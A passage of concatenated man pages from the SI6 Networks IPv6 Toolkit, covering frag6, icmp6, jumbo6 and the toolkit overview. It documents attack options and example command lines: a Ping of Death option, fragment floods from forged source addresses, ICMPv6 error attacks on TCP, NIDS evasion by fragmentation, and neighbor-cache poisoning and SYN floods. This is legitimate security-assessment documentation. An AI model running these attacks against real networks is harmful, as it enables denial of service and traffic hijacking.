AAAAAAAAAA Frag. #2: BBBBBBBBBBB Frag. #3: CCCCCCCCCCC .fi .RE \fB Test #3\fR .sp .RS 4 .nf Frag. #1: AAAAAAAAAA Frag. #2: BBBBBBBBBBB Frag. #3: CCCCCCCCCCC .fi .RE \fB Test #4\fR .sp .RS 4 .nf Frag. #1: AAAAAAAAAA Frag. #2: BBBBBBBBBBB Frag. #3: CCCCCCCCCCCCCCCCCCCCCCCCCC .fi .RE \fB Test #5\fR .sp .RS 4 .nf Frag. #1: AAAAAAAAAA Frag. #2: BBBBBBBBBBB Frag. #3: CCCCCCCCCCC Frag. #4: DDDDDDDD .fi .RE .TP For each of the aforementioned tests, the tool reports which copy of the data is used by the target host. If there is no response from the host, the tool informs whether the host silently dropped the fragments, or sent an ICMPv6 Time Exceeded error message. .TP .BR \-W\| ,\ \-\-frag\-id\-policy This option instructs the tool to determine the fragment "Identification" generation policy. The tool sends a number of probe packets to the target node, and samples the "Identification" values of the corresponding response packets. Based on the sampled values, it tries to infer the fragment Identification generation policy of the target. The tool will first send a number of fragments from single IPv6 address, such that the per-destination policy is determined. The tool will then send a number of fragments from random IPv6 addresses (from the same prefix as the first fragments) such that the "global" fragment Identification generation policy can be inferred. The tool computes the expected value and the standard deviation of the difference between consecutive-sampled Identification values (IDn – IDn-1), with the intent of inferring the fragment Identification algorithm at the target node. For small values of the standard deviation, the fragment Identification is assumed to be a monotonically-increasing function with increments of the "expected value". For large values of the standard deviation, the fragment Identification is assumed to be randomized, and the expected value and standard deviation are informed to the user, as indicators of the "quality" of the fragment Identification generation algorithm. .TP .BR \-X\| ,\ \-\-pod\-attack This option instructs the tool to perform a "Ping of Death" attack against the specified target. .TP .BI \-F\ FRAG_NUMBER ,\ \-\-flood\-frags\ FRAG_NUMBER This option instructs the tool to send the specified number of fragments back-to-back to the target node. This option is likely to be used in conjunction with the "\-l" option, such that the process is repeated in a loop. .TP .BR \-l\| ,\ \-\-loop This option instructs the frag6 tool to periodically send IPv6 fragments to the target node. The amount of time to pause between sending a batch of fragments can be specified by means of the "\-z" option, and defaults to 1 second. .TP .BI \-z\ SECONDS ,\ \-\-sleep\ SECONDS This option specifies the amount of time that the tool should pause between sending btaches of IPv6 fragments (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP .BR \-v\| ,\ \-\-verbose This option instructs the frag6 tool to be verbose. If this option is set twice and the \-W option was set, the tool outputs the sampled Fragment Identification values (in addition to other information). .TP .BR \-h\| ,\ \-\-help Print help information for the .B frag6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B frag6 tool. \fBExample #1\fR # frag6 \-\-frag\-id\-policy \-d fc00:1::1 \-v Assess the fragment Identification generation policy of the host "fc00:1::1". Be verbose. \fBExample #2\fR # frag6 \-\-frag\-reass\-policy \-d fc00:1::1 \-v Assess the fragment reassembly policy of the host "fc00:1::1". Be verbose. \fBExample #3\fR # frag6 \-\-frag\-type atomic \-d fc00:1::1 \-v Send an IPv6 atomic fragment to the host "fc00:1::1". Be verbose. \fBExample #4\fR # frag6 \-s ::/0 \-\-flood\-frags 100 \-l \-z 5 \-d fc00:1::1 \-v Send 100 fragments (every 5 seconds) to the host fc00:1::1, using a forged IPv6 Source Address from the prefix ::/0. The aforementioned fragments should have an offset of 0, and the M bit set (i.e., be first-fragments). Be verbose. .SH AUTHOR The .B frag6 tool and the corresponding manual pages were produced by Fernando Gont for SI6 Networks . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/icmp6.1000066400000000000000000000445561223702747200165740ustar00rootroot00000000000000.TH ICMP6 1 .SH NAME icmp6 \- A security assessment tool for attack vectors based on ICMPv6 packets .SH SYNOPSIS .B icmp6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-c HOP_LIMIT] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-t TYPE[:CODE] | \-e CODE | \-A CODE \-V CODE \-R CODE] [\-r TARGET_ADDR] [\-x PEER_ADDR] [\-c HOP_LIMIT] [\-m MTU] [\-O POINTER] [\-p PAYLOAD_TYPE] [\-P PAYLOAD_SIZE] [\-n] [\-a SRC_PORTL[:SRC_PORTH]] [\-o DST_PORTL[:DST_PORTH]] [\-X TCP_FLAGS] [\-q TCP_SEQ] [\-Q TCP_ACK] [\-V TCP_URP] [\-w TCP_WIN] [\-M] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-f] [\-L | \-l] [\-z] [\-v] [\-h] .SH DESCRIPTION .B icmp6 allows the assessment of IPv6 implementations with respect to a variety of attack vectors based on ICMPv6 error messages. It is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 Protocols. This tool has two modes of operation: "active" and "listening". In active mode, the tool attacks a specific target without listening to any incoming traffic, while in "listening" mode the tool listens to traffic on the local network, and launches an attack in response to such traffic. Active mode is employed if an IPv6 Destination Address is specified. "Listening" mode is employed if the "\-L" option (or its long counterpart "\-\-listen") is set. If both an attack target and the "\-L" option are specified, the attack is launched against the specified target, and then the tool enters "listening" mode to respond incoming packets with ICMPv6 error messages. The tool supports filtering of incoming packets based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, and the IPv6 Destination Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming packet matches any of those filters, the message is discarded (and thus no ICMPv6 error messages are sent in response). If any "accept filter" is specified, incoming packets must match the specified filters in order for the tool to respond with ICMPv6 error messages. .SH OPTIONS .B icmp6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). The icmp6 tool supports IPv6 fragmentation, which might be of use to circumvent layer-2 filtering and/or Network Intrusion Detection Systems (NIDS). However, IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, or the "listening" ("\-L") mode is selected, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. If a prefix is specified, the Source Address is randomly selected from that prefix. If this option is left unspecified, the IPv6 Source Address of the attack packets is randomly selected from the prefix ::/0. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the victim. It can be left unspecified only if the "\-L" option is selected (that is, if the tool is to operate in "listening" mode). When operating in "listening" mode ("\-L" option), the IPv6 Destination Address is selected according to the IPv6 Source Address of the incoming packet. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the attack packets. If left unspecified, the link\-layer Source Address is randomized. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the attack packets. If left unspecified, it is set to that of the local router (for non-local destinations) or to that corresponding to the destination host (for local hosts). When operating in "listening" mode, the link\-layer Destination Address is set to the link\-layer Source Address of the incoming packet. .TP .BI \-c\ HOP_LIMIT ,\ \-\-hop\-limit\ HOP_LIMIT This option specifies the Hop Limit to be used for the Redirect messages. If this option is left unspecified, the Hop Limit is randomized to a value between 64 and 243. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the ICMPv6 error messages must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the outgoing packet(s). The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop-by-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-t\ TYPE ,\ \-\-icmp6\ TYPE This option specifies the Type and Code of the ICMPv6 error message in the form "\-\-icmp6 TYPE:CODE". If left unspecified, the ICMPv6 error message defaults to "Parameter Problem, Erroneous header field encountered" (Type 4, Code 0). Note: Other options (such as "\-\-icmp6\-unreachable") provide an alternative for setting the ICMPv6 Type and Code. .TP .BR \-e\| ,\ \-\-icmp6\-dest\-unreach This option sets the ICMPv6 Type to "1" (Destination Unreachable), and allows the user to specify the ICMPv6 Code, in the form "\-\-icmp6\-dest-unreach CODE". Note: this option is an alternative to the "\-t" option for setting the ICMPv6 Type and Code. .TP .BR \-E\| ,\ \-\-icmp6\-packet\-too\-big This option sets the ICMPv6 Type to "1", and the ICMPv6 Code to "0" (Packet Too Big). Note: this option is an alternative to the "\-t" option for setting the ICMPv6 Type and Code. .TP .BR \-A\| ,\ \-\-icmp6\-time\-exceeded This option sets the ICMPv6 Type to "3" (Time Exceeded), and allows the user to specify the ICMPv6 Code, in the form "\-\-icmp6\-time-exceeded CODE". Note: this option is an alternative to the "\-t" option for setting the ICMPv6 Type and Code. .TP .BR \-R\| ,\ \-\-icmp6\-param\-problem This option sets the ICMPv6 Type to "4" (Parameter Problem), and allows the user to specify the ICMPv6 Code, in the form "\-\-icmp6\-param-problem CODE". Note: this option is an alternative to the "\-t" option for setting the ICMPv6 Type and Code. .TP .BI \-m\ MTU ,\ \-\-mtu\ MTU This specifies the value of the "MTU" field of ICMPv6 Packet Too Big error messages. .TP .BI \-O\ POINTER ,\ \-\-pointer\ POINTER This option specifies the value of the "Pointer" field of ICMPv6 Parameter Problem error messages. .TP .BI \-p\ TYPE ,\ \-\-payload\-type\ TYPE This option specifies the payload type to be included in the ICMPv6 Payload. Currently supported payloads are "TCP", "UDP", and "ICMP6". The payload-type defaults to "TCP". When the tool operates in "Listening" mode, this option specifies the type of packets the tool will listen to. In listening mode, an additional type can be specified: "IP6"; this will cause the tool to listen to all IPv6 traffic. .TP .BI \-P\ SIZE ,\ \-\-payload\-size\ SIZE Size of the payload to be included in the ICMPv6 Payload (with the payload type being specified by the "\-p" option). By default, as many bytes as possible are included, without exceeding the minimum IPv6 MTU (1280 bytes). .TP .BR \-n\| ,\ \-\-no\-payload This option specifies that no payload should be included within the ICMPv6 error message. .TP .BI \-C\ HOP_LIMIT ,\ \-\-ipv6\-hlim\ HOP_LIMIT This option specifies the Hop Limit of the IPv6 packet included in the payload of the ICMPv6 error message. If this option is left unspecified, the Hop Limit is randomized to a value between 64 and 243. .TP .BI \-r\ ADDRESS ,\ \-\-target\-addr\ ADDRESS This option specifies the Source Address of the IPv6 packet that is embedded in the ICMPv6 error message. If left unspecified, it is set to the same address as the IPv6 Destination Address of the outer packet. When operating in "Listening mode", the tool automatically embeds a piece of the received packet (unless otherwise specified by the "\-n" option), and hence the IPv6 Source Address of the embedded IPv6 packet is set accordingly. .TP .BI \-x\ ADDRESS ,\ \-\-peer\-addr\ ADDRESS This option specifies the Destination Address of the IPv6 packet that is embedded in the ICMPv6 error message. If left unspecified, it is set to a random value. When operating in "Listening mode", the tool automatically embeds a piece of the received packet (unless otherwise specified by the "\-n" option), and hence the IPv6 Destination Address of the embedded IPv6 packet is set accordingly. Note: since the victim host is expected to check that the ICMPv6 error message corresponds to an ongoing communication instance, when operating in "active mode", this option should be set to a value that corresponds to an ongoing communication instance. .TP .BI \-o\ PORT ,\ \-\-target\-port\ PORT This option specifies the Source Port of the TCP or UDP packet contained in the ICMPv6 Payload. If a port range is specified in the form "\-o LOWPORT:HIGHPORT" the tool will send one ICMPv6 error message for each port in that range. Note: This option is meaningful only if "TCP" or "UDP" have been specified (with the "\-p" option). .TP .BI \-a\ PORT ,\ \-\-peer\-port\ PORT This option specifies the Destination Port of the TCP or UDP packet contained in the ICMPv6 Payload. If a port range is specified in the form "\-o LOWPORT:HIGHPORT" the tool will send one ICMPv6 error message for each port in that range. Note: This option is meaningful only if "TCP" or "UDP" have been specified (with the "\-p" option). .TP .BI \-X\ TCP_FLAGS ,\ \-\-tcp\-flags\ TCP_FLAGS This option specifies the flags of the TCP header contained in the ICMPv6 Payload. The flags are specified as "F" (FIN), "S" (SYN), "R" (RST), "P" (PSH), "A" (ACK), "U" (URG), "X" (no flags). If left unspecified, only the "ACK" bit is set. Note: This option is meaningful only if "TCP" has been specified (with the "\-p" option). .TP .BI \-q\ SEQ_NUMBER ,\ \-\-tcp\-seq\ SEQ_NUMBER This option specifies the Sequence Number of the TCP header contained in the ICMPv6 Payload. If left unspecified, the Sequence Number is randomized. Note: This option is meaningful only if "TCP" has been specified (with the "\-p" option). .TP .BI \-Q\ ACK_NUMBER ,\ \-\-tcp\-ack\ ACK_NUMBER This option specifies the Acknowledgment Number of the TCP header contained in the ICMPv6 Payload. If left unspecified, the Acknowledgment Number is randomized. Note: This option is meaningful only if "TCP" has been specified (with the "\-p" option). .TP .BI \-V\ URG_POINTER ,\ \-\-tcp\-urg\ URG_POINTER This option specifies the Urgent Pointer of the TCP header contained in the ICMPv6 Payload. If left unspecified, the Urgent Pointer is set to 0. Note: This option is meaningful only if "TCP" has been specified (with the "\-p" option). .TP .BI \-w\ TCP_WIN ,\ \-\-tcp\-win\ TCP_WIN This option specifies the Window of the TCP header contained in the ICMPv6 Payload. If left unspecified, the Window is randomized. Note: This option is meaningful only if "TCP" has been specified (with the "\-p" option). .TP .BI \-j\ SRC_ADDR ,\ \-\-block\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-k\ DST_ADDR ,\ \-\-block\-dst\ DST_ADDR This option sets a block filter for the incoming Neighbor Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-J\ SRC_ADDR ,\ \-\-block\-link\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Source Address. The option must be followed by a link\-layer address (currently, only Ethernet is supported). .TP .BI \-K\ DST_ADDR ,\ \-\-block\-link\-dst\ DST_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (currently, only Ethernet is supported). .TP .BI \-b\ SRC_ADDR ,\ \-\-accept\-src\ SRC_ADDR This option sets an accept filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-g\ DST_ADDR ,\ \-\-accept\-dst\ DST_ADDR This option sets a accept filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-B\ SRC_ADDR ,\ \-\-accept\-link\-src\ SRC_ADDR This option sets an accept filter for the incoming Neighbor Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (currently, only Ethernet is supported). .TP .BI \-G\ DST_ADDR ,\ \-\-accept\-link\-dst\ DST_ADDR This option sets an accept filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (currently, only Ethernet is supported). .TP .BR \-f\| ,\ \-\-sanity\-filters This option automatically adds a "block filter" for the IPv6 Source Address of the packets. Note: This option may be desirable when the tool operates in "Listening mode" and is instructed to listen to "ICMP6" or "IP6" packets (thus possibly avoiding packet loops). .TP .BR \-l\| ,\ \-\-loop This option instructs the icmp6 tool to send periodic ICMPv6 error messages to the victim node. The amount of time to pause between sending ICMPv6 error messages can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP .BR \-z\| ,\ \-\-sleep This option specifies the amount of time to pause between sending ICMPv6 error messages (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP .BR \-L\| ,\ \-\-listen This instructs the icmp6 tool to operate in "Listening" mode (possibly after attacking a given node). Note that this option cannot be used in conjunction with the "\-l" ("\-\-loop") option. .TP .BR \-v\| ,\ \-\-verbose This option instructs the icmp6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been accepted or discarded as a result of applying the specified filters. .TP .BR \-h\| ,\ \-\-help Print help information for the .B icmp6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B icmp6 tool. \fBExample #1\fR # icmp6 \-i eth0 \-L \-p TCP \-v The tool employs the network interface "eth0", and operates in "Listening" mode ("\-L" option). Each ICMPv6 error message will contain the ICMPv6 Payload as many bytes from the captured packet without exceeding the minimum IPv6 MTU (1280 bytes). The tool will print detailed information about the attack ("\-v" option). \fBExample #2\fR # icmp6 \-\-icmp6\-packet\-too\-big \-p ICMP6 \-d 2001:db8:10::1 \-\-peer\-addr 2001:db8:11::2 \-m 1240 \-v The tool will send an ICMPv6 Packet Too Big error message that advertises an MTU of 1240 bytes. The ICMPv6 error message will be sent to the address " "2001:db8:10::1". The ICMPv6 error message will embed an ICMPv6 Echo Request message with the Source Address set to "2001:db8:10::1" (i.e., Destination Address of the error message), and the Destination Address set to "2001:db8:11::2) ("\-\-peer\-addr" option). The value of the "Identifier" and "Sequence Number" fields of the embedded ICMPv6 Echo Request message will be randomized. The tool will provide detailed information about the attack ("\-v" option). .SH SEE ALSO RFC 5927 (available at ) and "Security Assessment of the Transmission Control Protocol (TCP)" (available at ) for a discussion of ICMPv6 attacks against TCP. .SH AUTHOR The .B icmp6 tool and the corresponding manual pages were produced by Fernando Gont for SI6 Networks. .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/ipv6toolkit.7000066400000000000000000000100671223702747200200440ustar00rootroot00000000000000.TH IPV6TOOLKIT 7 .SH NAME ipv6toolkit \- An IPv6 security assessment and trouble\-shooting toolkit .SH DESCRIPTION The SI6 Networks' IPv6 Toolkit is a security assessment and trouble\-shooting toolkit for IPv6 networks and implementations. It provides a number of tools to send abitrary IPv6 packets, perform IPv6 address\-scans, analyze IPv6 addresses, etc. The current version of the toolkit includes the following tools: * addr6 * flow6 * frag6 * icmp6 * jumbo6 * na6 * ni6 * ns6 * ra6 * rd6 * rs6 * scan6 * tcp6 .B addr6 is an IPv6 address analysis and manipulation tool. Given a list of IPv6 addresses, it can filter such list based on different criteria, such as IPv6 address type, IPv6 address scope, IPv6 prefix, etc. Additionally, given a list of IPv6 addresses .B addr6 can produce statistics on such addresses, including address scopes, types, and type of IPv6 interface identifier. .B addr6 can also analyze a single address, producing script\-friendly output, such that its analysis can be leveraged by other tools or scripts. .B flow6 allows the security assessment of the IPv6 Flow Label. Essentially, it can be leveraged to assess the Flow Label generation policy of a terget implementation. .B frag6 is a security assessment tool for the IPv6 fragmentation mechanism. It allows the exploitation of fragmentation\-based attacks, and can also be employed to assess the Fragment Identification generation policy, assess support for IPv6 atomic fragments, etc. .B icmp6 is a security assessment tool for the ICMPv6 protocol. It can easily produce arbitrary ICMPv6 error messages, and includes the capability to generate such messages in response to received traffic. .B icmp6 can also be used to send crafted ICMPv6 messages of arbitrary type/code combinations. .B jumbo6 is a secuity assessment tool for IPv6 Jumbograms. .B na6 is a security assessment tool for attack vectors based on Neighbor Advertisement messages (including Neighbor Cache poisoning attacks, DAD attacks, etc.). .B ni6 is a security assessment tool for attacks vectors and reconnaissance techniques based on ICMPv6 Node Information messages. .B ns6 is a security assessment tool for attack vectors based on Neighbor Solicitation messages (including Neighbor Cache poisoning attacks, Neighbor Cahe exhaustion attacks, etc.). .B ra6 is a security assessment tool for attack vectors based on Router Advertisement messages (including various types of fooding attacks, man-in-the-middle attacks, and Denial of Service attacks, etc.). .B rd6 is a security assessment tool for attack vectors based on ICMPv6 Redirect messages. It can easily produce arbitrary ICMPv6 Redirect messages, and also includes the capability to generate such messages in response to received traffic. .B rs6 is a security assessment tool for attack vectors based on Router Solicitation messages. .B scan6 is a full-fledged IPv6 address scanning tool, which can leverage specific IPv6 address patterns to greatly reduce the search space for "alive" nodes. .B tcp6 is a security assessment tool for attack vectors based on TCP/IPv6 packets. It can be easily employed to launch classic TCP\-based attacks such as SYN-floods, but can also be employed to launch other more complex attacks such as TCP connection floods, etc. .SH SEE ALSO .BR ipv6toolkit.conf (5), .BR addr6 (1), .BR flow6 (1), .BR frag6 (1), .BR icmp6 (1), .BR jumbo6 (1), .BR na6 (1), .BR ni6 (1), .BR ns6 (1), .BR ra6 (1), .BR rd6 (1), .BR rs6 (1), .BR scan6 (1), .BR tcp6 (1) .SH AUTHOR The SI6 Networks' IPv6 Toolkit and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/ipv6toolkit.conf.5000066400000000000000000000035221223702747200207640ustar00rootroot00000000000000.TH IPV6TOOLKIT.CONF 5 .SH NAME ipv6toolkit.conf \- Configuration file for the SI6 Networks' IPv6 address monitoring daemon (ipv6mon) .SH SYNOPSIS .B /etc/ipv6toolkit.conf .SH DESCRIPTION This file controls the operation of the .B SI6 Networks' IPv6 Toolkit \[char46] It aloows the system administrator to configure parameters such as: .TS tab (@); l l. @\+ Location of the IEEE OUI database .TE The configuration file follows the following general format: .sp .RS 4 .nf # Comments Variable1=Value1 # Comments Variable2=Value2 .fi .RE The following configuration options are currently supported: .TP \fBOUI-Database\fR This variable specifies the location of the IEEE OUI database. If left unspecified, the IEEE OUI databased is expected to be found "/usr/share/oui.txt". This is a stripped down version of the IEEE OUI list available at . The tool is able to process the raw file available from the IEEE site (hence the included oui.txt file can be overwritten with a freshly downloaded copy without any additional processing). .SH EXAMPLES The following is a sample .IR ipv6toolkit.conf file. .sp .nf # SI6 Networks IPv6 Toolkit Configuration File OUI-Database=/usr/share/ipv6toolkit/oui.txt .fi .RE .SH AUTHOR The .B SI6 Networks' IPv6 Toolkit and the corresponding manual pages were produced by Fernando Gont for SI6 Networks . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/jumbo6.1000066400000000000000000000153441223702747200167510ustar00rootroot00000000000000.TH JUMBO6 1 .SH NAME jumbo6 \- A security assessment tool for attack vectors based on IPv6 jumbograms .SH SYNOPSIS .B jumbo6 .RB [\| \-i .IR INTERFACE\| ] [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-A HOP_LIMIT] [\-H HBH_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-q IPV6_LENGTH] [\-Q JUMBO_LENGTH] [\-P PAYLOAD_SIZE] [\-l] [\-z SECONDS] [\-v] [\-h] .SH DESCRIPTION .B jumbo6 allows the assessment of IPv6 implementations with respect to attack vectors based on IPv6 jumbograms. It is part of the SI6 Networks' IPv6 Toolkit : a security assessment suite for the IPv6 protocols. This tool has only one mode of operation: active mode. In active mode, the tool sends IPv6 jumbograms to the specified target, and informs the user of any received ICMPv6 error messages (typically "ICMPv6 Parameter Problem" error messages). .SH OPTIONS .B jumbo6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). jumbo6 supports IPv6 Extension Headers, including the IPv6 Fragmentation Header, which might be of use to circumvent layer\-2 filtering and/or Network Intrusion Detection Systems (NIDS). However, IPv6 extension headers are not employed by default, and must be explicitly enabled with the corresponding options. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link\-local address, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the probe packets. If left unspecified, the link\-layer Source Address of the packets is set to the real link\-layer address of the network interface. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the probe packets (currently, only Ethernet is supported). By default, the link\-layer Destination Address is automatically set to the link\-layer address of the destination host (for on-link destinations) or to the link\-layer address of the first-hop router. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the outgoing packets. If an IPv6 prefix is specified, the IPv6 Source Address of the outgoing packets will be randomized from that prefix. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the target node. This option cannot be left unspecified. .TP \-\-hop\-limit, \-A This option specifies the Hop Limit to be used for the IPv6 packets. By default, the Hop Limit is randomized. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP \-\-ipv6\-length, \-q This option specifies the value that the "Total Length" field of the IPv6 header should be set to. If this option is left unspecified, the "Total Length" field is set to 0, as required by the IPv6 jumbograms specification. .TP \-\-jumbo\-length, \-Q This option specifies the value to which the "Jumbo Payload Length" field of the Jumbo Payload option should be set. If this option is left unspecified, the "Jumbo Payload Length" field is set according to the real size of the jumbo payload (see the "\-p" option). .TP \-\-payload\-size, \-P This options specifies the size of the jumbo payload. If left unspecified, the payload size is set to 0. .TP \-\-loop, \-l This option instructs the jumbo6 tool to send periodic IPv6 jumbograms to the victim node. The amount of time to pause between sending IPv6 jumbograms can be specified by means of the "\-z" option, and defaults to 1 second. .TP \-\-sleep, \-z This option specifies the amount of time to pause between sending IPv6 jumbograms (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP \-\-verbose, \-v This option instructs the jumbo6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been accepted or discarded as a result of applying the specified filters. .TP \-\-help, \-h Print help information for the jumbo6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B jumbo6 tool. \fBExample #1\fR # jumbo6 \-s fc00:1::/64 \-d fc00:1::1 \-P 100 Send an IPv6 jumbogram to the host fc00:1::1. The IPv6 Source Address will be randomly selected from the prefix fc00:1::/64, and a the payload of 100 bytes is included in the packet. .SH AUTHOR The .B jumbo6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/na6.1000066400000000000000000000456561223702747200162440ustar00rootroot00000000000000.TH NA6 1 .SH NAME na6 \- A security assessment tool for attack vectors based on ICMPv6 Neighbor Advertisement messages .SH 